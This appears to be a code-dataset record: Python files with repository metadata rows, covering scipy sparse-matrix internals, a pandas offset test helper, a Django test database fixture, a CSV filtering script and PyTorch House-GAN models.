        M, N, self.indptr, self.indices, self.data, i0, i1, j0, j1)

    shape = self._swap((i1 - i0, j1 - j0))
    return self.__class__((data, indices, indptr), shape=shape,
                          dtype=self.dtype, copy=False)
def _set_intXint(self, row, col, x):
    # Scalar assignment: delegate to the bulk setter.
    i, j = self._swap((row, col))
    self._set_many(i, j, x)
def _set_arrayXarray(self, row, col, x):
    # Dense array assignment: delegate to the bulk setter.
    i, j = self._swap((row, col))
    self._set_many(i, j, x)
def _set_arrayXarray_sparse(self, row, col, x):
    """Assign a sparse matrix ``x`` into the positions given by index
    arrays ``row``/``col`` (with single-row/column broadcasting)."""
    # Clear all affected positions first, then insert x's nonzeros.
    self._zero_many(*self._swap((row, col)))

    M, N = row.shape  # matches col.shape
    broadcast_row = M != 1 and x.shape[0] == 1
    broadcast_col = N != 1 and x.shape[1] == 1
    r, c = x.row, x.col

    x = np.asarray(x.data, dtype=self.dtype)
    if broadcast_row:
        # Replicate x's single row across all M target rows.
        r = np.repeat(np.arange(M), len(r))
        c = np.tile(c, M)
        x = np.tile(x, M)
    if broadcast_col:
        # Replicate x's single column across all N target columns.
        r = np.repeat(r, N)
        c = np.tile(np.arange(N), len(c))
        x = np.repeat(x, N)
    # Map x's (r, c) positions through the index arrays to coordinates.
    i, j = self._swap((row[r, c], col[r, c]))
    self._set_many(i, j, x)
def _setdiag(self, values, k):
    """Set diagonal ``k`` from ``values`` (a 0-d value broadcasts)."""
    if 0 in self.shape:
        # Degenerate matrix: no diagonal to set.
        return

    M, N = self.shape
    broadcast = (values.ndim == 0)

    if k < 0:
        if broadcast:
            max_index = min(M + k, N)
        else:
            max_index = min(M + k, N, len(values))
        i = np.arange(max_index, dtype=self.indices.dtype)
        j = np.arange(max_index, dtype=self.indices.dtype)
        i -= k  # shift rows down for sub-diagonals
    else:
        if broadcast:
            max_index = min(M, N - k)
        else:
            max_index = min(M, N - k, len(values))
        i = np.arange(max_index, dtype=self.indices.dtype)
        j = np.arange(max_index, dtype=self.indices.dtype)
        j += k  # shift columns right for super-diagonals

    if not broadcast:
        # Trim surplus values to the diagonal's length.
        values = values[:len(i)]

    self[i, j] = values
def _prepare_indices(self, i, j):
    """Ravel and bounds-check index arrays against the (major, minor)
    extents; returns (i, j, M, N)."""
    M, N = self._swap(self.shape)

    def check_bounds(indices, bound):
        # Accepts indices in [-bound, bound); raises IndexError otherwise.
        idx = indices.max()
        if idx >= bound:
            raise IndexError('index (%d) out of range (>= %d)' %
                             (idx, bound))

        idx = indices.min()
        if idx < -bound:
            raise IndexError('index (%d) out of range (< -%d)' %
                             (idx, bound))

    i = np.array(i, dtype=self.indices.dtype, copy=False, ndmin=1).ravel()
    j = np.array(j, dtype=self.indices.dtype, copy=False, ndmin=1).ravel()
    check_bounds(i, M)
    check_bounds(j, N)
    return i, j, M, N
def _set_many(self, i, j, x):
    """Set the value at each (i, j) to x.

    Here (i, j) index the major and minor axes respectively.
    """
    i, j, M, N = self._prepare_indices(i, j)
    x = np.array(x, dtype=self.dtype, copy=False, ndmin=1).ravel()

    n_samples = x.size
    offsets = np.empty(n_samples, dtype=self.indices.dtype)
    ret = csr_sample_offsets(M, N, self.indptr, self.indices, n_samples,
                             i, j, offsets)
    if ret == 1:
        # Duplicate stored entries detected: canonicalize and retry.
        self.sum_duplicates()
        csr_sample_offsets(M, N, self.indptr, self.indices, n_samples,
                           i, j, offsets)

    if -1 not in offsets:
        # All targets already exist in the sparsity structure.
        self.data[offsets] = x
        return
    else:
        warn("Changing the sparsity structure of a {}_matrix is expensive."
             " lil_matrix is more efficient.".format(self.format),
             SparseEfficiencyWarning, stacklevel=3)
        # Overwrite the targets that do exist...
        mask = offsets > -1
        self.data[offsets[mask]] = x[mask]
        # ...and insert the rest (normalizing negative indices first).
        mask = ~mask
        i = i[mask]
        i[i < 0] += M
        j = j[mask]
        j[j < 0] += N
        self._insert_many(i, j, x[mask])
def _zero_many(self, i, j):
    """Set the value at each (i, j) to zero without changing the
    sparsity structure.

    Here (i, j) index the major and minor axes respectively.
    """
    i, j, M, N = self._prepare_indices(i, j)

    n_samples = len(i)
    offsets = np.empty(n_samples, dtype=self.indices.dtype)
    ret = csr_sample_offsets(M, N, self.indptr, self.indices, n_samples,
                             i, j, offsets)
    if ret == 1:
        # Duplicate stored entries detected: canonicalize and retry.
        self.sum_duplicates()
        csr_sample_offsets(M, N, self.indptr, self.indices, n_samples,
                           i, j, offsets)

    # Only assign zeros to positions already in the structure (-1 means
    # the position is an implicit zero and needs no change).
    self.data[offsets[offsets > -1]] = 0
def _insert_many(self, i, j, x):
    """Insert a new nonzero at each (i, j) with value x.

    Here (i, j) index the major and minor axes respectively; i, j and x
    are 1-d arrays. Entries are merged one major group (row/column) at a
    time; for duplicate (i, j) pairs the last value wins. Restores the
    has_sorted_indices property if it held on entry.
    """
    # Stable sort by major index so duplicate handling keeps input order.
    order = np.argsort(i, kind='mergesort')
    i = i.take(order, mode='clip')
    j = j.take(order, mode='clip')
    x = x.take(order, mode='clip')

    do_sort = self.has_sorted_indices

    # Widen the index dtype if the grown nnz requires it.
    idx_dtype = get_index_dtype((self.indices, self.indptr),
                                maxval=(self.indptr[-1] + x.size))
    self.indptr = np.asarray(self.indptr, dtype=idx_dtype)
    self.indices = np.asarray(self.indices, dtype=idx_dtype)
    i = np.asarray(i, dtype=idx_dtype)
    j = np.asarray(j, dtype=idx_dtype)

    # Collate the old and new entries, chunked by major index.
    indices_parts = []
    data_parts = []
    ui, ui_indptr = np.unique(i, return_index=True)
    ui_indptr = np.append(ui_indptr, len(j))
    new_nnzs = np.diff(ui_indptr)
    prev = 0
    for c, (ii, js, je) in enumerate(zip(ui, ui_indptr, ui_indptr[1:])):
        # Existing entries up to (but excluding) major index ii.
        start = self.indptr[prev]
        stop = self.indptr[ii]
        indices_parts.append(self.indices[start:stop])
        data_parts.append(self.data[start:stop])

        # New entries for this major index; reversing before np.unique
        # makes the *last* value for a duplicate minor index win.
        uj, uj_indptr = np.unique(j[js:je][::-1], return_index=True)
        if len(uj) == je - js:
            # No duplicate minor indices in this group.
            indices_parts.append(j[js:je])
            data_parts.append(x[js:je])
        else:
            indices_parts.append(j[js:je][::-1][uj_indptr])
            data_parts.append(x[js:je][::-1][uj_indptr])
            new_nnzs[c] = len(uj)

        prev = ii

    # Remaining existing entries after the last touched major index.
    start = self.indptr[ii]
    indices_parts.append(self.indices[start:])
    data_parts.append(self.data[start:])

    # Rebuild indices/data and recompute indptr from the new counts.
    self.indices = np.concatenate(indices_parts)
    self.data = np.concatenate(data_parts)
    nnzs = np.empty(self.indptr.shape, dtype=idx_dtype)
    nnzs[0] = idx_dtype(0)
    indptr_diff = np.diff(self.indptr)
    indptr_diff[ui] += new_nnzs
    nnzs[1:] = indptr_diff
    self.indptr = np.cumsum(nnzs, out=nnzs)

    if do_sort:
        # Insertions may have broken per-row ordering; re-sort.
        self.has_sorted_indices = False
        self.sort_indices()

    self.check_format(full_check=False)
dtype=self.dtype)
tocoo.__doc__ = spmatrix.tocoo.__doc__
def toarray(self, order=None, out=None):
    if out is None and order is None:
        # Default to this format's natural memory order ('c' for CSR,
        # 'f' for CSC, via _swap).
        order = self._swap('cf')[0]
    out = self._process_toarray_args(order, out)
    if not (out.flags.c_contiguous or out.flags.f_contiguous):
        raise ValueError('Output array must be C or F contiguous')
    # Match the sparse format to the output array's layout so the dense
    # fill walks memory contiguously.
    if out.flags.c_contiguous:
        x = self.tocsr()
        y = out
    else:
        x = self.tocsc()
        y = out.T
    M, N = x._swap(x.shape)
    csr_todense(M, N, x.indptr, x.indices, x.data, y)
    return out

toarray.__doc__ = spmatrix.toarray.__doc__
.fill(0)
self.indptr[1:][major_index] = val
np.cumsum(self.indptr, out=self.indptr)
self._shape = shape
resize.__doc__ = spmatrix.resize.__doc__
s__((data, self.indices, self.indptr),
shape=self.shape, dtype=data.dtype)
def _binopt(self, other, op):
    """Apply the binary operation ``op`` to two sparse matrices via the
    corresponding _sparsetools routine."""
    other = self.__class__(other)

    # e.g. csr_plus_csr, csr_minus_csr, etc.
    fn = getattr(_sparsetools, self.format + op + self.format)

    # Preallocate for the worst case (disjoint sparsity patterns).
    maxnnz = self.nnz + other.nnz
    idx_dtype = get_index_dtype((self.indptr, self.indices,
                                 other.indptr, other.indices),
                                maxval=maxnnz)
    indptr = np.empty(self.indptr.shape, dtype=idx_dtype)
    indices = np.empty(maxnnz, dtype=idx_dtype)

    # Comparison ops produce boolean data; the rest upcast the operands.
    bool_ops = ['_ne_', '_lt_', '_gt_', '_le_', '_ge_']
    if op in bool_ops:
        data = np.empty(maxnnz, dtype=np.bool_)
    else:
        data = np.empty(maxnnz, dtype=upcast(self.dtype, other.dtype))

    fn(self.shape[0], self.shape[1],
       np.asarray(self.indptr, dtype=idx_dtype),
       np.asarray(self.indices, dtype=idx_dtype),
       self.data,
       np.asarray(other.indptr, dtype=idx_dtype),
       np.asarray(other.indices, dtype=idx_dtype),
       other.data,
       indptr, indices, data)

    A = self.__class__((data, indices, indptr), shape=self.shape)
    A.prune()  # drop the unused tail of the preallocated arrays

    return A
def _divide_sparse(self, other):
    """Divide this matrix by a second sparse matrix of the same shape."""
    if other.shape != self.shape:
        raise ValueError('inconsistent shapes')

    r = self._binopt(other, '_eldiv_')

    if np.issubdtype(r.dtype, np.inexact):
        # Fill positions outside other's sparsity pattern with nan
        # (division by an implicit zero); inside the pattern the result
        # is either zero or defined by eldiv.
        out = np.empty(self.shape, dtype=self.dtype)
        out.fill(np.nan)
        row, col = other.nonzero()
        out[row, col] = 0
        r = r.tocoo()
        out[r.row, r.col] = r.data
        out = matrix(out)
    else:
        # integer types go with nan <-> 0
        out = r

    return out
def _process_slice(sl, num):
if sl is None:
i0, i1 = 0, num
elif isinstance(sl, slice):
i0, i1, stride = sl.indices(num)
if stride != 1:
raise ValueError('slicing with step != 1 not supported')
i0 = min(i0, i1) # give an empty slice when i0 > i1
elif isintlike(sl):
if sl < 0:
sl += num
i0, i1 = sl, sl + 1
if i0 < 0 or i1 > num:
raise IndexError('index out of bounds: 0 <= %d < %d <= %d' %
(i0, i1, num))
else:
raise TypeError('expected slice or scalar')
return i0, i1
| true | true |
f72ef0d45883357b7389e4970e9395830f94792a | 80 | py | Python | run.py | 5x/ds-ants-geopy-extended | 6017b5da444cc33bde47f0c7cf2cf06a640a354c | [
"MIT"
] | null | null | null | run.py | 5x/ds-ants-geopy-extended | 6017b5da444cc33bde47f0c7cf2cf06a640a354c | [
"MIT"
] | null | null | null | run.py | 5x/ds-ants-geopy-extended | 6017b5da444cc33bde47f0c7cf2cf06a640a354c | [
"MIT"
] | 1 | 2019-12-06T10:20:08.000Z | 2019-12-06T10:20:08.000Z | from ants.ants import demonstrate
if __name__ == '__main__':
demonstrate()
| 16 | 33 | 0.725 | from ants.ants import demonstrate
if __name__ == '__main__':
demonstrate()
| true | true |
f72ef1faaa7d4dac60adb50472f713f106ff3158 | 758 | py | Python | venv/Lib/site-packages/pandas/tests/tseries/offsets/common.py | Jos33y/student-performance-knn | 4e965434f52dd6a1380904aa257df1edfaebb3c4 | [
"MIT"
] | 1 | 2021-02-06T21:00:00.000Z | 2021-02-06T21:00:00.000Z | venv/Lib/site-packages/pandas/tests/tseries/offsets/common.py | Jos33y/student-performance-knn | 4e965434f52dd6a1380904aa257df1edfaebb3c4 | [
"MIT"
] | null | null | null | venv/Lib/site-packages/pandas/tests/tseries/offsets/common.py | Jos33y/student-performance-knn | 4e965434f52dd6a1380904aa257df1edfaebb3c4 | [
"MIT"
] | null | null | null | """
Assertion helpers for offsets tests
"""
def assert_offset_equal(offset, base, expected):
    """Check that applying ``offset`` to ``base`` gives ``expected`` via
    addition in both orders and via ``offset.apply``."""
    # Evaluate all three application forms up front.
    outcomes = (offset + base, base + offset, offset.apply(base))
    try:
        for outcome in outcomes:
            assert outcome == expected
    except AssertionError:
        # Re-raise with a diagnostic message showing the primary result.
        raise AssertionError(
            f"\nExpected: {expected}\nActual: {outcomes[0]}\nFor Offset: {offset})"
            f"\nAt Date: {base}"
        )
def assert_is_on_offset(offset, date, expected):
    """Check that ``offset.is_on_offset(date)`` equals ``expected``."""
    observed = offset.is_on_offset(date)
    assert observed == expected, (
        f"\nExpected: {expected}\nActual: {observed}\nFor Offset: {offset})"
        f"\nAt Date: {date}"
    )
| 28.074074 | 79 | 0.60686 |
def assert_offset_equal(offset, base, expected):
actual = offset + base
actual_swapped = base + offset
actual_apply = offset.apply(base)
try:
assert actual == expected
assert actual_swapped == expected
assert actual_apply == expected
except AssertionError:
raise AssertionError(
f"\nExpected: {expected}\nActual: {actual}\nFor Offset: {offset})"
f"\nAt Date: {base}"
)
def assert_is_on_offset(offset, date, expected):
actual = offset.is_on_offset(date)
assert actual == expected, (
f"\nExpected: {expected}\nActual: {actual}\nFor Offset: {offset})"
f"\nAt Date: {date}"
)
| true | true |
f72ef247c55be69d301aa864fe18c01087abc773 | 587 | py | Python | conftest.py | hackoregon/neighborhoods-2018 | 2e1bf837365182a212527e1afbedddc759d0ee78 | [
"MIT"
] | 6 | 2018-03-16T00:06:31.000Z | 2019-06-02T21:27:03.000Z | conftest.py | hackoregon/neighborhoods-2018 | 2e1bf837365182a212527e1afbedddc759d0ee78 | [
"MIT"
] | 53 | 2018-03-16T03:29:04.000Z | 2021-06-10T20:17:11.000Z | conftest.py | hackoregon/neighborhoods-2018 | 2e1bf837365182a212527e1afbedddc759d0ee78 | [
"MIT"
] | 1 | 2018-06-20T16:03:40.000Z | 2018-06-20T16:03:40.000Z | import pytest
import os
import neighborhoods_backend
@pytest.fixture(scope='session')
def django_db_setup():
    """Session-scoped pytest fixture: point Django's default database at
    the Postgres instance described by POSTGRES_* environment variables,
    using the geventpool psycopg2 backend."""
    env = os.environ.get
    db_config = {
        'ENGINE': 'django_db_geventpool.backends.postgresql_psycopg2',
        'PASSWORD': env('POSTGRES_PASSWORD'),
        'NAME': env('POSTGRES_NAME'),
        'USER': env('POSTGRES_USER'),
        'HOST': env('POSTGRES_HOST'),
        'PORT': env('POSTGRES_PORT'),
        # Close connections after each request; cap the pool at 20.
        'CONN_MAX_AGE': 0,
        'OPTIONS': {
            'MAX_CONNS': 20
        }
    }
    neighborhoods_backend.settings.DATABASES['default'] = db_config
| 29.35 | 70 | 0.633731 | import pytest
import os
import neighborhoods_backend
@pytest.fixture(scope='session')
def django_db_setup():
neighborhoods_backend.settings.DATABASES['default'] = {
'ENGINE': 'django_db_geventpool.backends.postgresql_psycopg2',
'PASSWORD': os.environ.get('POSTGRES_PASSWORD'),
'NAME': os.environ.get('POSTGRES_NAME'),
'USER': os.environ.get('POSTGRES_USER'),
'HOST': os.environ.get('POSTGRES_HOST'),
'PORT': os.environ.get('POSTGRES_PORT'),
'CONN_MAX_AGE': 0,
'OPTIONS': {
'MAX_CONNS': 20
}
}
| true | true |
f72ef2fc7fec4b7efa2f516ad4626de6d8822b3b | 1,605 | py | Python | filter_from_list.py | skratchdot/media-tools | bca0c683fb637aeefda1c49454a118f809047d97 | [
"MIT"
] | 13 | 2019-12-09T07:56:13.000Z | 2021-08-03T01:45:53.000Z | filter_from_list.py | skratchdot/media-tools | bca0c683fb637aeefda1c49454a118f809047d97 | [
"MIT"
] | 1 | 2020-04-29T00:00:14.000Z | 2021-07-09T14:24:19.000Z | filter_from_list.py | skratchdot/media-tools | bca0c683fb637aeefda1c49454a118f809047d97 | [
"MIT"
] | 3 | 2020-04-27T15:36:36.000Z | 2021-03-29T17:52:35.000Z | # -*- coding: utf-8 -*-
import argparse
import inspect
import math
import os
from pprint import pprint
import sys
from lib.collection_utils import *
from lib.io_utils import *
from lib.math_utils import *
# input
parser = argparse.ArgumentParser()
parser.add_argument('-in', dest="INPUT_FILE", default="tmp/samples.csv", help="Input file")
parser.add_argument('-blist', dest="BLACK_LIST", default="", help="CSV file for blacklist of entries")
parser.add_argument('-wlist', dest="WHITE_LIST", default="", help="CSV file for whitelist of entries")
parser.add_argument('-key', dest="KEY", default="id", help="Key to match on")
parser.add_argument('-probe', dest="PROBE", action="store_true", help="Just show details?")
parser.add_argument('-out', dest="OUTPUT_FILE", default="", help="File to output results; leave empty to update input file")
a = parser.parse_args()
OUTPUT_FILE = a.OUTPUT_FILE if len(a.OUTPUT_FILE) > 0 else a.INPUT_FILE
# Read files
fieldNames, rows = readCsv(a.INPUT_FILE)
rowCount = len(rows)
if len(a.BLACK_LIST) > 0:
_, blist = readCsv(a.BLACK_LIST)
bids = set([item[a.KEY] for item in blist])
rows = [item for item in rows if item[a.KEY] not in bids]
rowCount = len(rows)
print("%s rows after blacklist filtering" % rowCount)
if len(a.WHITE_LIST) > 0:
_, wlist = readCsv(a.WHITE_LIST)
wids = set([item[a.KEY] for item in wlist])
rows = [item for item in rows if item[a.KEY] in wids]
rowCount = len(rows)
print("%s rows after whitelist filtering" % rowCount)
if a.PROBE:
sys.exit()
writeCsv(OUTPUT_FILE, rows, headings=fieldNames)
| 33.4375 | 124 | 0.709034 |
import argparse
import inspect
import math
import os
from pprint import pprint
import sys
from lib.collection_utils import *
from lib.io_utils import *
from lib.math_utils import *
parser = argparse.ArgumentParser()
parser.add_argument('-in', dest="INPUT_FILE", default="tmp/samples.csv", help="Input file")
parser.add_argument('-blist', dest="BLACK_LIST", default="", help="CSV file for blacklist of entries")
parser.add_argument('-wlist', dest="WHITE_LIST", default="", help="CSV file for whitelist of entries")
parser.add_argument('-key', dest="KEY", default="id", help="Key to match on")
parser.add_argument('-probe', dest="PROBE", action="store_true", help="Just show details?")
parser.add_argument('-out', dest="OUTPUT_FILE", default="", help="File to output results; leave empty to update input file")
a = parser.parse_args()
OUTPUT_FILE = a.OUTPUT_FILE if len(a.OUTPUT_FILE) > 0 else a.INPUT_FILE
fieldNames, rows = readCsv(a.INPUT_FILE)
rowCount = len(rows)
if len(a.BLACK_LIST) > 0:
_, blist = readCsv(a.BLACK_LIST)
bids = set([item[a.KEY] for item in blist])
rows = [item for item in rows if item[a.KEY] not in bids]
rowCount = len(rows)
print("%s rows after blacklist filtering" % rowCount)
if len(a.WHITE_LIST) > 0:
_, wlist = readCsv(a.WHITE_LIST)
wids = set([item[a.KEY] for item in wlist])
rows = [item for item in rows if item[a.KEY] in wids]
rowCount = len(rows)
print("%s rows after whitelist filtering" % rowCount)
if a.PROBE:
sys.exit()
writeCsv(OUTPUT_FILE, rows, headings=fieldNames)
| true | true |
f72ef3946956775383152170dd5a17cfd84646d4 | 5,126 | py | Python | src/models.py | athatheo/House-GANs-Reproduction | 00cc807f1e74f88eef5ed81615bfd87a39c52f94 | [
"MIT"
] | null | null | null | src/models.py | athatheo/House-GANs-Reproduction | 00cc807f1e74f88eef5ed81615bfd87a39c52f94 | [
"MIT"
] | null | null | null | src/models.py | athatheo/House-GANs-Reproduction | 00cc807f1e74f88eef5ed81615bfd87a39c52f94 | [
"MIT"
] | null | null | null | import torch
from torch import cat
from torch.nn import Conv2d
from torch.nn import Linear
from torch.nn import Module
from torch.nn import ConvTranspose2d
from torch.nn import LeakyReLU
from torch.nn import Tanh
from torch.nn import MaxPool2d
from torch import zeros_like
class ConvMPN(Module):
    """Conv-MPN message-passing block.

    Concatenates each node's 16-channel feature map with the summed maps
    of its neighbours and non-neighbours (48 channels total), then
    applies three 3x3 convolutions with leaky-ReLU activations, ending
    back at 16 channels.
    """

    def __init__(self):
        super().__init__()
        self.conv1 = Conv2d(in_channels=3 * 16, out_channels=2 * 16,
                            kernel_size=(3, 3), stride=(1, 1), padding=1)
        self.conv2 = Conv2d(in_channels=2 * 16, out_channels=2 * 16,
                            kernel_size=(3, 3), stride=(1, 1), padding=1)
        self.conv3 = Conv2d(in_channels=2 * 16, out_channels=16,
                            kernel_size=(3, 3), stride=(1, 1), padding=1)
        self.leaky_relu = LeakyReLU(0.1)

    def get_nodes(self, feature_vectors, edges, include_neighbours=True):
        """Sum, per node, the feature maps of its (non-)neighbours.

        Edge rows are (node_a, relation, node_b); relation > 0 marks a
        neighbouring pair, relation < 0 a non-neighbouring one.
        """
        device = feature_vectors.device
        pooled = zeros_like(feature_vectors, device=device)
        if include_neighbours:
            rows = torch.where(edges[:, 1] > 0)
        else:
            rows = torch.where(edges[:, 1] < 0)
        # Aggregate in both directions: a contributes to b and b to a.
        sources = torch.cat([edges[rows[0], 0], edges[rows[0], 2]]).long()
        targets = torch.cat([edges[rows[0], 2], edges[rows[0], 0]]).long()
        gathered = feature_vectors[sources.contiguous()]
        targets = targets.view(-1, 1, 1, 1).expand_as(gathered).to(device)
        return pooled.scatter_add(0, targets, gathered)

    def cat_nodes(self, feature_vectors, edges):
        """Stack own / neighbour / non-neighbour maps along channels."""
        neighbour_sum = self.get_nodes(feature_vectors, edges,
                                       include_neighbours=True)
        stranger_sum = self.get_nodes(feature_vectors, edges,
                                      include_neighbours=False)
        return torch.cat([feature_vectors, neighbour_sum, stranger_sum], 1)

    def forward(self, x, edges):
        x = self.cat_nodes(x, edges)
        x = self.leaky_relu(self.conv1(x))
        x = self.leaky_relu(self.conv2(x))
        return self.leaky_relu(self.conv3(x))
class Generator(Module):
    """Graph-conditioned generator: maps per-node noise plus a one-hot
    room-type vector to a 32x32 mask per node, exchanging information
    between nodes through two Conv-MPN stages."""

    def __init__(self):
        super().__init__()
        self.linear_reshape_1 = Linear(138, 1024)
        self.conv_mpn_1 = ConvMPN()
        self.upsample_1 = ConvTranspose2d(16, 16, 4, 2, 1)
        self.conv_mpn_2 = ConvMPN()
        self.upsample_2 = ConvTranspose2d(16, 16, 4, 2, 1)
        self.conv_1 = Conv2d(16, 256, 3, 1, 1)
        self.leaky_relu = LeakyReLU(0.1)
        self.conv_2 = Conv2d(256, 128, 3, 1, 1)
        self.conv_3 = Conv2d(128, 1, 3, 1, 1)
        self.tanh = Tanh()

    def forward(self, z, t, edges):
        # Concatenate 128-d noise with the 10-d type vector per node.
        noise = z.view(-1, 128)
        room_type = t.view(-1, 10)
        x = cat([noise, room_type], 1)
        # Project to a 16-channel 8x8 feature map per node.
        x = self.linear_reshape_1(x).view(-1, 16, 8, 8)
        # Message passing + upsampling: 8x8 -> 16x16 -> 32x32.
        x = self.conv_mpn_1(x, edges).view(-1, *x.shape[1:])
        x = self.leaky_relu(self.upsample_1(x))
        x = self.conv_mpn_2(x, edges).view(-1, *x.shape[1:])
        x = self.leaky_relu(self.upsample_2(x))
        # Decode to a single-channel mask in [-1, 1].
        x = x.view(-1, x.shape[1], *x.shape[2:])
        x = self.leaky_relu(self.conv_1(x))
        x = self.leaky_relu(self.conv_2(x))
        x = self.tanh(self.conv_3(x))
        # Drop the singleton channel dimension.
        return x.view(-1, *x.shape[2:])
class Discriminator(Module):
    """Graph-conditioned discriminator: scores 32x32 room masks given
    their room types, pooling per-node features into one score per
    sample."""

    def __init__(self):
        super().__init__()
        self.linear_reshape_1 = Linear(10, 8192)
        self.leaky_relu = LeakyReLU(0.1)
        self.conv_1 = Conv2d(9, 16, 3, 1, 1, bias=True)
        self.conv_2 = Conv2d(16, 16, 3, 1, 1)
        self.conv_3 = Conv2d(16, 16, 3, 1, 1)
        self.conv_mpn_1 = ConvMPN()
        self.downsample_1 = Conv2d(16, 16, 3, 2, 1)
        self.conv_mpn_2 = ConvMPN()
        self.downsample_2 = Conv2d(16, 16, 3, 2, 1)
        self.dec_conv_1 = Conv2d(16, 256, 3, 2, 1)
        self.dec_conv_2 = Conv2d(256, 128, 3, 2, 1)
        self.dec_conv_3 = Conv2d(128, 128, 3, 2, 1)
        self.pool_reshape_linear = Linear(128, 1)

    def add_pool(self, x, nd_to_sample):
        """Sum per-node vectors into one vector per sample, using
        nd_to_sample as the node -> sample mapping."""
        device = x.device
        n_samples = torch.max(nd_to_sample) + 1
        pooled = torch.zeros(n_samples, x.shape[-1], device=device).float()
        scatter_idx = nd_to_sample.view(-1, 1).expand_as(x).to(device)
        return pooled.scatter_add(0, scatter_idx, x)

    def forward(self, x, t, edges, nd_to_sample):
        # Room mask (1 channel) + room-type embedding as 8 channels.
        mask = x.view(-1, 1, 32, 32)
        cond = self.linear_reshape_1(t).view(-1, 8, 32, 32)
        h = cat([mask, cond], 1)
        h = self.leaky_relu(self.conv_1(h))
        h = self.leaky_relu(self.conv_2(h))
        h = self.leaky_relu(self.conv_3(h))
        # Message passing with downsampling: 32x32 -> 16x16 -> 8x8.
        h = self.conv_mpn_1(h, edges)
        h = self.leaky_relu(self.downsample_1(h))
        h = self.conv_mpn_2(h, edges)
        h = self.leaky_relu(self.downsample_2(h))
        # Strided decoder down to a 128-d vector per node.
        h = self.leaky_relu(self.dec_conv_1(h))
        h = self.leaky_relu(self.dec_conv_2(h))
        h = self.leaky_relu(self.dec_conv_3(h))
        h = h.view(-1, h.shape[1])
        # Pool node features per sample, then score.
        h = self.add_pool(h, nd_to_sample)
        return self.pool_reshape_linear(h)
| 36.35461 | 110 | 0.584666 | import torch
from torch import cat
from torch.nn import Conv2d
from torch.nn import Linear
from torch.nn import Module
from torch.nn import ConvTranspose2d
from torch.nn import LeakyReLU
from torch.nn import Tanh
from torch.nn import MaxPool2d
from torch import zeros_like
class ConvMPN(Module):
def __init__(self):
super().__init__()
self.conv1 = Conv2d(in_channels=3*16, out_channels=2*16, kernel_size=(3, 3), stride=(1, 1), padding=1)
self.conv2 = Conv2d(in_channels=2*16, out_channels=2*16, kernel_size=(3, 3), stride=(1, 1), padding=1)
self.conv3 = Conv2d(in_channels=2*16, out_channels=16, kernel_size=(3, 3), stride=(1, 1), padding=1)
self.leaky_relu = LeakyReLU(0.1)
def get_nodes(self, feature_vectors, edges, include_neighbours=True):
device = feature_vectors.device
nodes = zeros_like(feature_vectors, device=device)
if include_neighbours:
index = torch.where(edges[:, 1] > 0)
else:
index = torch.where(edges[:, 1] < 0)
src = torch.cat([edges[index[0], 0], edges[index[0], 2]]).long()
dst = torch.cat([edges[index[0], 2], edges[index[0], 0]]).long()
src = feature_vectors[src.contiguous()]
dst = dst.view(-1, 1, 1, 1).expand_as(src).to(device)
return nodes.scatter_add(0, dst, src)
def cat_nodes(self, feature_vectors, edges):
neighbouring_nodes = self.get_nodes(feature_vectors, edges, include_neighbours=True, )
non_neighbouring_nodes = self.get_nodes(feature_vectors, edges, include_neighbours=False)
encoding = torch.cat([feature_vectors, neighbouring_nodes, non_neighbouring_nodes], 1)
return encoding
def forward(self, x, edges):
x = self.cat_nodes(x, edges)
x = self.conv1(x)
x = self.leaky_relu(x)
x = self.conv2(x)
x = self.leaky_relu(x)
x = self.conv3(x)
x = self.leaky_relu(x)
return x
class Generator(Module):
def __init__(self):
super().__init__()
self.linear_reshape_1 = Linear(138, 1024)
self.conv_mpn_1 = ConvMPN()
self.upsample_1 = ConvTranspose2d(16, 16, 4, 2, 1)
self.conv_mpn_2 = ConvMPN()
self.upsample_2 = ConvTranspose2d(16, 16, 4, 2, 1)
self.conv_1 = Conv2d(16, 256, 3, 1, 1)
self.leaky_relu = LeakyReLU(0.1)
self.conv_2 = Conv2d(256, 128, 3, 1, 1)
self.conv_3 = Conv2d(128, 1, 3, 1, 1)
self.tanh = Tanh()
def forward(self, z, t, edges):
z = z.view(-1, 128)
t = t.view(-1, 10)
x = cat([z, t], 1)
x = self.linear_reshape_1(x)
x = x.view(-1, 16, 8, 8)
x = self.conv_mpn_1(x, edges).view(-1, *x.shape[1:])
x = self.upsample_1(x)
x = self.leaky_relu(x)
x = self.conv_mpn_2(x, edges).view(-1, *x.shape[1:])
x = self.upsample_2(x)
x = self.leaky_relu(x)
x = self.conv_1(x.view(-1, x.shape[1], *x.shape[2:]))
x = self.leaky_relu(x)
x = self.conv_2(x)
x = self.leaky_relu(x)
x = self.conv_3(x)
x = self.tanh(x)
x = x.view(-1, *x.shape[2:])
return x
class Discriminator(Module):
def __init__(self):
super().__init__()
self.linear_reshape_1 = Linear(10, 8192)
self.leaky_relu = LeakyReLU(0.1)
self.conv_1 = Conv2d(9, 16, 3, 1, 1, bias=True)
self.conv_2 = Conv2d(16, 16, 3, 1, 1)
self.conv_3 = Conv2d(16, 16, 3, 1, 1)
self.conv_mpn_1 = ConvMPN()
self.downsample_1 = Conv2d(16, 16, 3, 2, 1)
self.conv_mpn_2 = ConvMPN()
self.downsample_2 = Conv2d(16, 16, 3, 2, 1)
self.dec_conv_1 = Conv2d(16, 256, 3, 2, 1)
self.dec_conv_2 = Conv2d(256, 128, 3, 2, 1)
self.dec_conv_3 = Conv2d(128, 128, 3, 2, 1)
self.pool_reshape_linear = Linear(128, 1)
def add_pool(self, x, nd_to_sample):
dtype, device = x.dtype, x.device
batch_size = torch.max(nd_to_sample) + 1
pooled_x = torch.zeros(batch_size, x.shape[-1], device=device).float()
pool_to = nd_to_sample.view(-1, 1).expand_as(x).to(device)
pooled_x = pooled_x.scatter_add(0, pool_to, x)
return pooled_x
def forward(self, x, t, edges, nd_to_sample):
x = x.view(-1, 1, 32, 32)
t = self.linear_reshape_1(t)
t = t.view(-1, 8, 32, 32)
x = cat([x, t], 1)
x = self.conv_1(x)
x = self.leaky_relu(x)
x = self.conv_2(x)
x = self.leaky_relu(x)
x = self.conv_3(x)
x = self.leaky_relu(x)
x = self.conv_mpn_1(x, edges)
x = self.downsample_1(x)
x = self.leaky_relu(x)
x = self.conv_mpn_2(x, edges)
x = self.downsample_2(x)
x = self.leaky_relu(x)
x = self.dec_conv_1(x)
x = self.leaky_relu(x)
x = self.dec_conv_2(x)
x = self.leaky_relu(x)
x = self.dec_conv_3(x)
x = self.leaky_relu(x)
x = x.view(-1, x.shape[1])
x = self.add_pool(x, nd_to_sample)
x = self.pool_reshape_linear(x)
return x
| true | true |
